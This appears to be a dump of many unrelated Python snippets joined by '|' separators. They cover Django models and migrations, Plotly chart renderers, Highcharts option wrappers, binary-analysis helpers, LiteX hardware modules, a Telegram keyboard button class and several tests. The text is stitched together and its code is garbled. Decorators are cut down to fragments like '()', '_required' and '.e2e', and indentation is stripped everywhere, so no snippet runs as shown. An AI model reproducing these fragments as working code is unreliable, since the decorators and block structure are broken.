operations = [migrations.CreateModel(name='STP', fields=[('code', models.CharField(max_length=3, primary_key=True, serialize=False)), ('name', models.CharField(blank=True, max_length=200, null=True)), ('regional_team', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='frontend.RegionalTeam'))]), migrations.AddField(model_name='measurevalue', name='stp', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='frontend.STP')), migrations.AddField(model_name='pct', name='stp', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='frontend.STP'))] |
def _migrate_summary_info(data_file: DataFile, ens_config: EnsembleConfig) -> List[ResponseConfig]:
seen = set()
for block in data_file.blocks(Kind.SUMMARY):
if (block.name in seen):
continue
seen.add(block.name)
return ([ens_config['summary']] if seen else []) |
def info_aubio(fp):
info = {}
with aubio.source(fp) as f:
info['duration'] = (f.duration / f.samplerate)
info['samples'] = f.duration
info['channels'] = f.channels
info['sampling_rate'] = f.samplerate
return info |
_renderer(wrap_type=ClassificationProbDistribution)
class ClassificationProbDistributionRenderer(MetricRenderer):
def _plot(self, distribution: Dict[(str, list)]):
graphs = []
for label in distribution:
pred_distr = ff.create_distplot(distribution[label], [str(label), 'other'], colors=[self.color_options.primary_color, self.color_options.secondary_color], bin_size=0.05, show_curve=False, show_rug=True)
pred_distr.update_layout(xaxis_title='Probability', yaxis_title='Share', legend=dict(orientation='h', yanchor='bottom', y=1.02, xanchor='right', x=1))
pred_distr_json = pred_distr.to_plotly_json()
graphs.append({'title': str(label), 'data': pred_distr_json['data'], 'layout': pred_distr_json['layout']})
return graphs
def render_html(self, obj: ClassificationProbDistribution) -> List[BaseWidgetInfo]:
metric_result = obj.get_result()
reference_distribution = metric_result.reference_distribution
current_distribution = metric_result.current_distribution
result = []
size = WidgetSize.FULL
if (reference_distribution is not None):
size = WidgetSize.HALF
if (current_distribution is not None):
result.append(plotly_graph_tabs(title='Current: Probability Distribution', size=size, figures=[GraphData(graph['title'], graph['data'], graph['layout']) for graph in self._plot(current_distribution)]))
if (reference_distribution is not None):
result.append(plotly_graph_tabs(title='Reference: Probability Distribution', size=size, figures=[GraphData(graph['title'], graph['data'], graph['layout']) for graph in self._plot(reference_distribution)]))
return result |
def get_basemesh_nodes(W):
(pstart, pend) = W.mesh().topology_dm.getChart()
section = W.dm.getDefaultSection()
basemeshoff = numpy.empty((pend - pstart), dtype=IntType)
basemeshdof = numpy.empty((pend - pstart), dtype=IntType)
basemeshlayeroffset = numpy.empty((pend - pstart), dtype=IntType)
layer_offsets = numpy.full(W.node_set.total_size, (- 1), dtype=IntType)
layer_offsets[W.cell_node_map().values_with_halo] = W.cell_node_map().offset
nlayers = W.mesh().layers
for p in range(pstart, pend):
dof = section.getDof(p)
off = section.getOffset(p)
if (dof == 0):
dof_per_layer = 0
layer_offset = 0
else:
layer_offset = layer_offsets[off]
assert (layer_offset >= 0)
dof_per_layer = (dof - ((nlayers - 1) * layer_offset))
basemeshoff[(p - pstart)] = off
basemeshdof[(p - pstart)] = dof_per_layer
basemeshlayeroffset[(p - pstart)] = layer_offset
return (basemeshoff, basemeshdof, basemeshlayeroffset) |
def test_A_fails_with_incorrect_dict():
correct_d = {'terms': {'field': 'tags'}, 'aggs': {'per_author': {'terms': {'field': 'author.raw'}}}}
with raises(Exception):
aggs.A(correct_d, field='f')
d = correct_d.copy()
del d['terms']
with raises(Exception):
aggs.A(d)
d = correct_d.copy()
d['xx'] = {}
with raises(Exception):
aggs.A(d) |
def arm_infer_functions(functions):
if functions.binary.sections.has_sec(INIT):
init_sec_addr = functions.binary.sections.get_sec(INIT).addr
if functions.is_lowpc_function(init_sec_addr):
_init = functions.get_function_by_lowpc(init_sec_addr)
_init.name = '_init'
_init.train_name = '_init'
_init.test_name = '_init'
_init.is_name_given = True
_init.is_run_init = False
if functions.binary.sections.has_sec(FINI):
fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
if functions.is_lowpc_function(fini_sec_addr):
_fini = functions.get_function_by_lowpc(fini_sec_addr)
_fini.name = '_fini'
_fini.train_name = '_fini'
_fini.test_name = '_fini'
_fini.is_name_given = True
_fini.is_run_init = False
if functions.is_lowpc_function(functions.binary.entry_point):
_start = functions.get_function_by_lowpc(functions.binary.entry_point)
_start.name = '_start'
_start.train_name = '_start'
_start.test_name = '_start'
_start.is_name_given = True
_start.is_run_init = False
for blk_bap in _start.bap.blks:
stmts = blk_bap.stmts
for i in range((len(stmts) - 1), (- 1), (- 1)):
stmt = stmts[i]
if (isinstance(stmt, JmpStmt) and isinstance(stmt.kind, CallKind) and isinstance(stmt.kind.target, DirectLabel)):
target_tid = stmt.kind.target.target_tid
called_f = functions.get_function_by_tid(target_tid)
if ((called_f is not None) and (called_f.name == '__libc_start_main') and (i > 0)):
main_pc = None
init_pc = None
fini_pc = None
fini_reg = None
for j in range((i - 2), (- 1), (- 1)):
stmt = stmts[j]
if isinstance(stmt, DefStmt):
if (isinstance(stmt.lhs, RegVar) and (stmt.lhs.name == 'R0') and isinstance(stmt.rhs, IntExp) and functions.is_lowpc_function(stmt.rhs.value) and (main_pc is None)):
main_pc = stmt.rhs.value
main = functions.get_function_by_lowpc(main_pc)
if (functions.binary.config.MODE == functions.binary.config.TEST):
main.name = 'main'
main.train_name = 'main'
main.test_name = 'main'
main.is_name_given = True
main.is_run_init = True
elif (isinstance(stmt.lhs, RegVar) and (stmt.lhs.name == 'R3') and isinstance(stmt.rhs, IntExp) and functions.is_lowpc_function(stmt.rhs.value) and (init_pc is None)):
init_pc = stmt.rhs.value
init = functions.get_function_by_lowpc(init_pc)
init.name = '__libc_csu_init'
init.train_name = '__libc_csu_init'
init.test_name = '__libc_csu_init'
init.is_name_given = True
init.is_run_init = False
elif (isinstance(stmt.lhs, MemVar) and isinstance(stmt.rhs, StoreExp) and isinstance(stmt.rhs.exp, IntExp) and functions.is_lowpc_function(stmt.rhs.exp.value) and (fini_pc is None)):
fini_pc = stmt.rhs.exp.value
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False
elif (isinstance(stmt.lhs, MemVar) and isinstance(stmt.rhs, StoreExp) and isinstance(stmt.rhs.exp, RegVar) and (fini_pc is None) and (fini_reg is None)):
fini_reg = (stmt.rhs.exp.name, stmt.rhs.exp.index)
elif (isinstance(stmt.lhs, RegVar) and isinstance(stmt.rhs, IntExp) and functions.is_lowpc_function(stmt.rhs.value) and (fini_pc is None) and (fini_reg is not None) and (fini_reg == (stmt.lhs.name, stmt.lhs.index))):
fini_pc = stmt.rhs.value
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False |
class _ScheduleModel(models.Model):
PT = PeriodicTask
_active = None
_schedule = None
periodic_task = models.ForeignKey(PT, null=True, blank=True)
class Meta():
app_label = 'vms'
abstract = True
def _new_periodic_task(self):
return NotImplemented
def _save_crontab(self, c):
(c.minute, c.hour, c.day_of_month, c.month_of_year, c.day_of_week) = self.schedule.split()
c.save()
return c
@staticmethod
def crontab_to_schedule(c):
def s(f):
return ((f and str(f).replace(' ', '')) or '*')
return ('%s %s %s %s %s' % (s(c.minute), s(c.hour), s(c.day_of_month), s(c.month_of_year), s(c.day_of_week)))
@property
def active(self):
if (self._active is None):
if self.periodic_task:
self._active = self.periodic_task.enabled
else:
self._active = True
return self._active
@active.setter
def active(self, value):
self._active = value
@property
def schedule(self):
if ((self._schedule is None) and self.periodic_task and self.periodic_task.crontab):
self._schedule = self.crontab_to_schedule(self.periodic_task.crontab)
return self._schedule
@schedule.setter
def schedule(self, value):
self._schedule = value
def save(self, *args, **kwargs):
super(_ScheduleModel, self).save(*args, **kwargs)
do_save = False
pt = self.periodic_task
if (not pt):
pt = self._new_periodic_task()
if (not pt.crontab):
pt.crontab = self._save_crontab(CrontabSchedule())
do_save = True
elif (self.schedule != self.crontab_to_schedule(pt.crontab)):
self._save_crontab(pt.crontab)
do_save = True
if (self.active != pt.enabled):
pt.enabled = self.active
do_save = True
if (not pt.pk):
pt.save()
self.periodic_task = pt
self.save(update_fields=('periodic_task',))
elif do_save:
pt.save(update_fields=('enabled', 'crontab', 'date_changed'))
def post_delete_schedule(sender, instance, **kwargs):
if instance.periodic_task:
if instance.periodic_task.crontab:
instance.periodic_task.crontab.delete()
else:
instance.periodic_task.delete() |
class UserLeadGenDisclaimerResponse(AbstractObject):
def __init__(self, api=None):
super(UserLeadGenDisclaimerResponse, self).__init__()
self._isUserLeadGenDisclaimerResponse = True
self._api = api
class Field(AbstractObject.Field):
checkbox_key = 'checkbox_key'
is_checked = 'is_checked'
_field_types = {'checkbox_key': 'string', 'is_checked': 'string'}
@classmethod
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
class PreconditioningProgram(object):
swagger_types = {}
attribute_map = {}
def __init__(self):
self.discriminator = None
def to_dict(self):
result = {}
for (attr, _) in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map((lambda x: (x.to_dict() if hasattr(x, 'to_dict') else x)), value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map((lambda item: ((item[0], item[1].to_dict()) if hasattr(item[1], 'to_dict') else item)), value.items()))
else:
result[attr] = value
if issubclass(PreconditioningProgram, dict):
for (key, value) in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if (not isinstance(other, PreconditioningProgram)):
return False
return (self.__dict__ == other.__dict__)
def __ne__(self, other):
return (not (self == other)) |
class OptionSeriesNetworkgraphSonificationContexttracksMappingGapbetweennotes(Options):
# Each option is a getter/setter pair on the same name, i.e. a property with a setter.
@property
def mapFunction(self):
return self._config_get(None)
@mapFunction.setter
def mapFunction(self, value: Any):
self._config(value, js_type=False)
@property
def mapTo(self):
return self._config_get(None)
@mapTo.setter
def mapTo(self, text: str):
self._config(text, js_type=False)
@property
def max(self):
return self._config_get(None)
@max.setter
def max(self, num: float):
self._config(num, js_type=False)
@property
def min(self):
return self._config_get(None)
@min.setter
def min(self, num: float):
self._config(num, js_type=False)
@property
def within(self):
return self._config_get(None)
@within.setter
def within(self, value: Any):
self._config(value, js_type=False) |
def walk(st, lex, rule=None):
(tok, children) = st
if (tok == pgen.PgenParser.RULE):
rule = children[0][0]
nodes.add(rule)
for child in children[1:]:
walk(child, lex, rule)
elif (isinstance(tok, str) and tok.strip() and (tok[0] in string.ascii_lowercase)):
nodes.add(tok)
if (rule is not None):
edges.add((rule, tok))
else:
for child in children:
walk(child, lex, rule) |
class RawType(BaseType):
def __init__(self, cstruct, name=None, size=0):
self.name = name
self.size = size
super().__init__(cstruct)
def __len__(self):
return self.size
def __repr__(self):
if self.name:
return self.name
return BaseType.__repr__(self)
def _read(self, stream):
raise NotImplementedError()
def _read_0(self, stream):
raise NotImplementedError()
def _write(self, stream, data):
raise NotImplementedError()
def _write_0(self, stream, data):
raise NotImplementedError()
def default(self):
raise NotImplementedError() |
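# Minimal sketch of a concrete subclass (illustrative only, not part of the
# library): the _read/_write hooks are what subclasses are expected to fill in.
# class UInt8(RawType):
#     def __init__(self, cstruct):
#         super().__init__(cstruct, name='uint8', size=1)
#     def _read(self, stream):
#         return stream.read(1)[0]
#     def _write(self, stream, data):
#         return stream.write(bytes([data])) |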
class OptionSeriesColumnpyramidSonification(Options):
@property
def contextTracks(self) -> 'OptionSeriesColumnpyramidSonificationContexttracks':
return self._config_sub_data('contextTracks', OptionSeriesColumnpyramidSonificationContexttracks)
@property
def defaultInstrumentOptions(self) -> 'OptionSeriesColumnpyramidSonificationDefaultinstrumentoptions':
return self._config_sub_data('defaultInstrumentOptions', OptionSeriesColumnpyramidSonificationDefaultinstrumentoptions)
@property
def defaultSpeechOptions(self) -> 'OptionSeriesColumnpyramidSonificationDefaultspeechoptions':
return self._config_sub_data('defaultSpeechOptions', OptionSeriesColumnpyramidSonificationDefaultspeechoptions)
@property
def enabled(self):
return self._config_get(True)
@enabled.setter
def enabled(self, flag: bool):
self._config(flag, js_type=False)
@property
def pointGrouping(self) -> 'OptionSeriesColumnpyramidSonificationPointgrouping':
return self._config_sub_data('pointGrouping', OptionSeriesColumnpyramidSonificationPointgrouping)
@property
def tracks(self) -> 'OptionSeriesColumnpyramidSonificationTracks':
return self._config_sub_data('tracks', OptionSeriesColumnpyramidSonificationTracks) |
()
def graph_no_dependency(variable_x, variable_u, variable_v, aliased_variable_y, variable_x_new, variable_u_new, variable_v_new, aliased_variable_y_new) -> Tuple[(List[BasicBlock], List[Instruction], ControlFlowGraph)]:
instructions = [Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant()])), Phi(variable_x[3], [variable_x[2], variable_x[4]]), Phi(variable_v[2], [variable_v[1], variable_v[3]]), Phi(variable_u[2], [variable_u[1], variable_u[3]]), Phi(aliased_variable_y[4], [aliased_variable_y[3], aliased_variable_y[5]]), Assignment(variable_u[3], aliased_variable_y[4]), Branch(Condition(OperationType.less_or_equal, [variable_v[2], variable_u[3]], CustomType('bool', 1))), Assignment(variable_x[4], variable_v[2]), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(), variable_x[4]]))]
nodes = [BasicBlock(i) for i in range(10)]
nodes[0].instructions = [instructions[0]]
nodes[1].instructions = instructions[1:7]
nodes[2].instructions = instructions[7:9]
instructions[1]._origin_block = {nodes[0]: variable_x[2], nodes[2]: variable_x[4]}
instructions[2]._origin_block = {nodes[0]: variable_v[1], nodes[2]: variable_v[3]}
instructions[3]._origin_block = {nodes[0]: variable_u[1], nodes[2]: variable_u[3]}
instructions[4]._origin_block = {nodes[0]: aliased_variable_y[3], nodes[2]: aliased_variable_y[5]}
cfg = ControlFlowGraph()
cfg.add_edges_from([UnconditionalEdge(nodes[0], nodes[1]), UnconditionalEdge(nodes[2], nodes[1])])
new_instructions = [Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant()])), Phi(variable_x_new[3], [variable_x_new[2], variable_x_new[4]]), Phi(variable_v_new[2], [variable_v_new[1], variable_v_new[3]]), Phi(variable_u_new[2], [variable_u_new[1], variable_u_new[3]]), Phi(aliased_variable_y_new[4], [aliased_variable_y_new[3], aliased_variable_y_new[5]]), Assignment(variable_u_new[3], aliased_variable_y_new[4]), Branch(Condition(OperationType.less_or_equal, [variable_v_new[2], variable_u_new[3]], CustomType('bool', 1))), Assignment(variable_x_new[4], variable_v_new[2]), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(), variable_x_new[4]]))]
new_instructions[1]._origin_block = {nodes[0]: variable_x_new[2], nodes[2]: variable_x_new[4]}
new_instructions[2]._origin_block = {nodes[0]: variable_v_new[1], nodes[2]: variable_v_new[3]}
new_instructions[3]._origin_block = {nodes[0]: variable_u_new[1], nodes[2]: variable_u_new[3]}
new_instructions[4]._origin_block = {nodes[0]: aliased_variable_y_new[3], nodes[2]: aliased_variable_y_new[5]}
return (nodes, new_instructions, cfg) |
_required
_required
_required(ImageAdminPermission)
_required(ImageImportAdminPermission)
def imagestore_list(request, repo=None):
user = request.user
context = collect_view_data(request, 'dc_image_list')
context['image_vm'] = ImageVm.get_uuid()
context['is_staff'] = is_staff = user.is_staff
context['all'] = _all = (is_staff and request.GET.get('all', False))
context['qs'] = qs = get_query_string(request, all=_all).urlencode()
context['url_form_admin'] = reverse('admin_image_form', query_string=qs)
context['form_admin'] = AdminImageForm(request, None, prefix='adm', initial={'owner': user.username, 'access': Image.PRIVATE, 'dc_bound': True})
qs_image_filter = request.GET.copy()
qs_image_filter.pop('created_since', None)
qs_image_filter.pop('last', None)
context['qs_image_filter'] = qs_image_filter.urlencode()
context['default_limit'] = default_limit = 30
context['image_uuids'] = set(Image.objects.all().values_list('uuid', flat=True))
try:
created_since_days = int(request.GET.get('created_since', 0))
except (ValueError, TypeError):
created_since_days = None
if created_since_days:
limit = None
else:
created_since_days = None
try:
limit = int(request.GET.get('last', default_limit))
except (ValueError, TypeError):
limit = default_limit
repositories = ImageStore.get_repositories(include_image_vm=request.user.is_staff)
context['imagestores'] = imagestores = ImageStore.all(repositories)
context['created_since'] = created_since_days
context['limit'] = limit
if repositories:
if (repo and (repo in repositories)):
context['imagestore'] = imagestore = ImageStore(repo, url=repositories[repo])
else:
context['imagestore'] = imagestore = imagestores[0]
if created_since_days:
created_since = make_aware((datetime.now() - timedelta(days=created_since_days)))
else:
created_since = None
context['images'] = imagestore.images_filter(created_since=created_since, limit=limit)
else:
context['imagestore'] = None
context['images'] = []
return render(request, 'gui/dc/imagestore_list.html', context) |
(name=MAX_PATH_EXT_RTFILTER_ALL)
def validate_max_path_ext_rtfilter_all(max_path_ext_rtfilter_all):
if (not isinstance(max_path_ext_rtfilter_all, bool)):
raise ConfigTypeError(desc=('Invalid max_path_ext_rtfilter_all configuration value %s' % max_path_ext_rtfilter_all))
return max_path_ext_rtfilter_all |
class OptionPlotoptionsPyramid3dSonificationContexttracksPointgrouping(Options):
@property
def algorithm(self):
return self._config_get('minmax')
@algorithm.setter
def algorithm(self, text: str):
self._config(text, js_type=False)
@property
def enabled(self):
return self._config_get(True)
@enabled.setter
def enabled(self, flag: bool):
self._config(flag, js_type=False)
@property
def groupTimespan(self):
return self._config_get(15)
@groupTimespan.setter
def groupTimespan(self, num: float):
self._config(num, js_type=False)
@property
def prop(self):
return self._config_get('y')
@prop.setter
def prop(self, text: str):
self._config(text, js_type=False) |
def resample_to_native(native_mesh, dest_mesh, settings, subject_id, sphere, expected_labels, reg_sphere_mesh):
copy_sphere_mesh_from_template(settings, dest_mesh)
resample_surfs_and_add_to_spec(subject_id, native_mesh, dest_mesh, current_sphere=sphere, current_sphere_mesh=reg_sphere_mesh)
make_inflated_surfaces(subject_id, dest_mesh, iterations_scale=0.75)
add_dense_maps_to_spec_file(subject_id, dest_mesh, settings.dscalars.keys(), expected_labels) |
class TestEnabledApisScannerTest():
.e2e
.scanner
.server
.skip(reason='Flaky test, sometimes no violation is found.')
def test_enabled_apis_scanner(self, cloudsql_connection, forseti_scan_readonly, project_id):
(scanner_id, scanner_result) = forseti_scan_readonly
violation_type = 'ENABLED_APIS_VIOLATION'
violation_rule_name = 'Restrict Compute Engine API'
assert scanner_id
regex = re.compile('EnabledApisScanner')
match = regex.search(str(scanner_result.stdout))
assert match
regex = re.compile('Scan completed')
match = regex.search(str(scanner_result.stdout))
assert match
query = text('SELECT COUNT(*) FROM forseti_security.violations V WHERE V.scanner_index_id = :scanner_id AND V.resource_id = :project_id AND V.rule_name = :violation_rule_name AND V.violation_type = :violation_type')
violation_count = cloudsql_connection.execute(query, project_id=project_id, scanner_id=scanner_id, violation_rule_name=violation_rule_name, violation_type=violation_type).fetchone()
assert (1 == violation_count[0]) |
class TestAction(ActionBase):
def ban(self, aInfo):
self._logSys.info('ban ainfo %s, %s, %s, %s', (aInfo['ipmatches'] != ''), (aInfo['ipjailmatches'] != ''), (aInfo['ipfailures'] > 0), (aInfo['ipjailfailures'] > 0))
self._logSys.info('jail info %d, %d, %d, %d', aInfo['jail.banned'], aInfo['jail.banned_total'], aInfo['jail.found'], aInfo['jail.found_total'])
def unban(self, aInfo):
pass |
def calc_clip_factor(clipping_value: float, norm: float) -> float:
if ((clipping_value < 0) or (norm < 0)):
raise ValueError('Error: max_norm and per_user_norm must be both positive.')
clip_factor = (clipping_value / (norm + __EPS__))
clip_factor = min(clip_factor, 1.0)
return clip_factor |
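# Worked example (assuming __EPS__ is a tiny module-level constant, e.g. 1e-10,
# that guards against division by zero): with clipping_value=1.0 and norm=4.0
# the factor is ~0.25 and the update is scaled down; with norm=0.5 the raw
# ratio is 2.0, so min() caps the factor at 1.0 and the update is left unchanged. |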
def get_numeric_gradient(predict, n, target):
gradient = numpy.zeros(n)
for i in range(n):
out1 = predict(i, 0.0001)
out2 = predict(i, (- 0.0001))
err1 = _get_loss(out1, target)
err2 = _get_loss(out2, target)
gradient[i] = ((err1 - err2) / (2 * 0.0001))
print('NGrad', i, err1, err2)
return gradient |
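# Sketch of a compatible `predict` callable (the names below are assumptions,
# not part of the original): the checker calls predict(i, eps) to get the model
# output with parameter i perturbed by eps, then forms the central difference
# (err1 - err2) / (2 * 1e-4) as an estimate of d(loss)/d(param_i).
# def predict(i, eps):
#     params[i] += eps
#     out = run_model(params)
#     params[i] -= eps
#     return out |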
('rocm.bert_embeddings.gen_function')
def bert_embeddings_gen_function(func_attrs: Dict[(str, Any)]) -> str:
backend_spec = ROCMSpec()
elem_input_type = backend_spec.dtype_to_lib_type(func_attrs['inputs'][3]._attrs['dtype'])
(input_ids, token_type_ids, position_ids, word_embeddings, token_type_embeddings, position_embeddings, gamma, beta) = func_attrs['inputs']
embedding_dim = word_embeddings._size((- 1)).value()
dtype = python_int_dtype_to_c_dtype(func_attrs['inputs'][0]._attrs['dtype'])
return FUNC_TEMPLATE.render(index_type=dtype, elem_input_type=elem_input_type, embedding_dim=embedding_dim, row_v_size=math.gcd(8, (embedding_dim // 256)), func_signature=FUNC_SIGNATURE.render(func_name=func_attrs['name'], index_type=dtype).strip()) |
def test_airflow_dag_get_tasks(airflow_api_tree):
dag_id = 'test_dag'
airflow_api_tree.dag_api.get_tasks.return_value = dict(tasks=[dict(class_ref=dict(module_path='test_module', class_name='test_class'), task_id='test_task_1', downstream_task_ids=[], group_name=None), dict(class_ref=dict(module_path='test_module', class_name='test_class'), task_id='test_task_2', downstream_task_ids=['test_task_1'], group_name=None)])
assert (airflow_api_tree.get_dags(dag_id=dag_id)[0].get_tasks() == [AirflowTask(class_ref=ClassRef(**task['class_ref']), task_id=task['task_id'], downstream_task_ids=task['downstream_task_ids'], group_name=None) for task in airflow_api_tree.dag_api.get_tasks.return_value['tasks']]) |
class AccessManualWebhook(Base):
connection_config_id = Column(String, ForeignKey(ConnectionConfig.id_field_path), unique=True, nullable=False)
connection_config = relationship(ConnectionConfig, back_populates='access_manual_webhook', uselist=False)
fields = Column(MutableList.as_mutable(JSONB), nullable=False)
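# Build a strict (extra='forbid') pydantic model whose optional string fields mirror the configured dsr_package_label entries.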
@property
def fields_schema(self) -> FidesSchema:
class Config():
extra = 'forbid'
field_definitions: Dict[(str, Any)] = {field['dsr_package_label']: (Optional[str], None) for field in (self.fields or [])}
ManualWebhookValidationModel = create_model(__model_name='ManualWebhookValidationModel', __config__=Config, **field_definitions)
return ManualWebhookValidationModel
@property
def erasure_fields_schema(self) -> FidesSchema:
class Config():
extra = 'forbid'
field_definitions: Dict[(str, Any)] = {field['dsr_package_label']: (Optional[bool], None) for field in (self.fields or [])}
ManualWebhookValidationModel = create_model(__model_name='ManualWebhookValidationModel', __config__=Config, **field_definitions)
return ManualWebhookValidationModel
@property
def fields_non_strict_schema(self) -> FidesSchema:
schema: FidesSchema = self.fields_schema
schema.__config__ = BaseConfig
return schema
@property
def erasure_fields_non_strict_schema(self) -> FidesSchema:
schema: FidesSchema = self.erasure_fields_schema
schema.__config__ = BaseConfig
return schema
@property
def empty_fields_dict(self) -> Dict[(str, None)]:
return {key: None for key in (self.fields_schema.schema().get('properties') or {}).keys()}
@classmethod
def get_enabled(cls, db: Session, action_type: Optional[ActionType]=None) -> List['AccessManualWebhook']:
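# A webhook counts as enabled when its connection is not disabled and its field list is non-empty; if an action_type is given, the connection's enabled_actions must include it (or be unset).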
query = db.query(cls).filter((AccessManualWebhook.connection_config_id == ConnectionConfig.id), ConnectionConfig.disabled.is_(False), (AccessManualWebhook.fields != text("'null'")), (AccessManualWebhook.fields != '[]'))
if (action_type is not None):
query = query.filter(or_(ConnectionConfig.enabled_actions.contains([action_type]), ConnectionConfig.enabled_actions.is_(None)))
return query.all() |
def _patch_attribute(member: Any, name: str, marker: '_Marker', providers_map: ProvidersMap) -> None:
provider = providers_map.resolve_provider(marker.provider, marker.modifier)
if (provider is None):
return
_patched_registry.register_attribute(PatchedAttribute(member, name, marker))
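# Provide markers are substituted with an instance obtained from the provider; Provider markers expose the provider object itself.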
if isinstance(marker, Provide):
instance = provider()
setattr(member, name, instance)
elif isinstance(marker, Provider):
setattr(member, name, provider)
else:
raise Exception(f'Unknown type of marker {marker}') |
class UnaryOp(expr):
_fields = ('op', 'operand')
_attributes = ('lineno', 'col_offset')
def __init__(self, op, operand, lineno=0, col_offset=0, **ARGS):
expr.__init__(self, **ARGS)
self.op = op
self.operand = operand
self.lineno = int(lineno)
self.col_offset = int(col_offset) |
class KNNRecommender(object):
def __init__(self, k=3, **kwargs):
self.k = k
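# Pipeline: text normalization, TF-IDF vectorization, truncated SVD (100 components), then a ball-tree k-NN transformer.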
self.pipeline = Pipeline([('norm', TextNormalizer(minimum=10, maximum=100)), ('tfidf', TfidfVectorizer()), ('knn', Pipeline([('svd', TruncatedSVD(n_components=100)), ('model', KNNTransformer(k=self.k, algorithm='ball_tree'))]))])
self.lex_path = 'lexicon.pkl'
self.vect_path = 'vect.pkl'
self.vectorizer = False
self.lexicon = None
self.load()
def load(self):
if os.path.exists(self.vect_path):
self.vectorizer = joblib.load(open(self.vect_path, 'rb'))
self.lexicon = joblib.load(open(self.lex_path, 'rb'))
else:
self.vectorizer = False
self.lexicon = None
def save(self):
joblib.dump(self.vect, open(self.vect_path, 'wb'))
joblib.dump(self.lexicon, open(self.lex_path, 'wb'))
def fit_transform(self, documents):
if (self.vectorizer == False):
self.lexicon = self.pipeline.fit_transform(documents)
self.vect = self.pipeline.named_steps['tfidf']
self.knn = self.pipeline.named_steps['knn']
self.save()
else:
self.vect = self.vectorizer
self.knn = Pipeline([('svd', TruncatedSVD(n_components=100)), ('knn', KNNTransformer(k=self.k, algorithm='ball_tree'))])
self.knn.fit_transform(self.lexicon)
def recommend(self, terms):
vect_doc = self.vect.transform(wordpunct_tokenize(terms))
distance_matches = self.knn.transform(vect_doc)
matches = distance_matches[0][1][0]
return matches |
class CatchUserErrorTest(TestCase):
@_user_error()
def throwsUserError(self):
raise UserError
def testCatchesUserError(self) -> None:
try:
self.throwsUserError()
except UserError:
self.fail('Unexpected UserError')
@_user_error()
def throwsException(self):
raise ValueError
def testDoesNotCatchOtherExceptions(self) -> None:
with self.assertRaises(ValueError):
self.throwsException() |
class KeyboardButton(Dictionaryable, JsonSerializable):
def __init__(self, text: str, request_contact: Optional[bool]=None, request_location: Optional[bool]=None, request_poll: Optional[KeyboardButtonPollType]=None, web_app: Optional[WebAppInfo]=None, request_user: Optional[KeyboardButtonRequestUser]=None, request_chat: Optional[KeyboardButtonRequestChat]=None):
self.text: str = text
self.request_contact: bool = request_contact
self.request_location: bool = request_location
self.request_poll: KeyboardButtonPollType = request_poll
self.web_app: WebAppInfo = web_app
self.request_user: KeyboardButtonRequestUser = request_user
self.request_chat: KeyboardButtonRequestChat = request_chat
def to_json(self):
return json.dumps(self.to_dict())
def to_dict(self):
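# Only serialize the optional button attributes that were explicitly provided.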
json_dict = {'text': self.text}
if (self.request_contact is not None):
json_dict['request_contact'] = self.request_contact
if (self.request_location is not None):
json_dict['request_location'] = self.request_location
if (self.request_poll is not None):
json_dict['request_poll'] = self.request_poll.to_dict()
if (self.web_app is not None):
json_dict['web_app'] = self.web_app.to_dict()
if (self.request_user is not None):
json_dict['request_user'] = self.request_user.to_dict()
if (self.request_chat is not None):
json_dict['request_chat'] = self.request_chat.to_dict()
return json_dict |
class S2DMA(Module):
def __init__(self, data_width, adr_width, address=0):
self.sink = sink = stream.Endpoint([('data', 8)])
self.source = source = stream.Endpoint([('address', adr_width), ('data', data_width)])
addr = Signal(adr_width, reset=address)
self.comb += [source.data.eq(sink.data), source.address.eq(addr), source.valid.eq(sink.valid), sink.ready.eq(source.ready)]
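# Advance the destination address on every accepted beat; reset to the base address when the last beat of a packet is seen.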
self.sync += [If((sink.valid & sink.ready), addr.eq((addr + 1)), If(sink.last, addr.eq(address)))] |
class LiteEthEtherboneWishboneMaster(LiteXModule):
def __init__(self):
self.sink = sink = stream.Endpoint(eth_etherbone_mmap_description(32))
self.source = source = stream.Endpoint(eth_etherbone_mmap_description(32))
self.bus = bus = wishbone.Interface()
data_update = Signal()
self.fsm = fsm = FSM(reset_state='IDLE')
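# FSM: wait for an MMAP record, run Wishbone write cycles (one per beat) or read cycles whose dat_r is latched into source.data and streamed out in SEND_DATA.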
fsm.act('IDLE', sink.ready.eq(1), If(sink.valid, sink.ready.eq(0), If(sink.we, NextState('WRITE_DATA')).Else(NextState('READ_DATA'))))
fsm.act('WRITE_DATA', bus.adr.eq(sink.addr), bus.dat_w.eq(sink.data), bus.sel.eq(sink.be), bus.stb.eq(sink.valid), bus.we.eq(1), bus.cyc.eq(1), If((bus.stb & bus.ack), sink.ready.eq(1), If(sink.last, NextState('IDLE'))))
fsm.act('READ_DATA', bus.adr.eq(sink.addr), bus.sel.eq(sink.be), bus.stb.eq(sink.valid), bus.cyc.eq(1), If((bus.stb & bus.ack), data_update.eq(1), NextState('SEND_DATA')))
self.sync += [sink.connect(source, keep={'base_addr', 'addr', 'count', 'be'}), source.we.eq(1), If(data_update, source.data.eq(bus.dat_r))]
fsm.act('SEND_DATA', sink.connect(source, keep={'valid', 'last', 'last_be', 'ready'}), If((source.valid & source.ready), If(source.last, NextState('IDLE')).Else(NextState('READ_DATA')))) |
class DclibOpenAiModel(DcModel):
def __init__(self, model, tokenizer, endpoint=None, **kwargs):
super().__init__(model, tokenizer, truncation_threshold=(- 12000), init_workers=False, **kwargs)
self.mock = kwargs.get('mock', False)
self.output_writer = None
if ('output_writer' in kwargs):
self.output_writer = kwargs['output_writer']
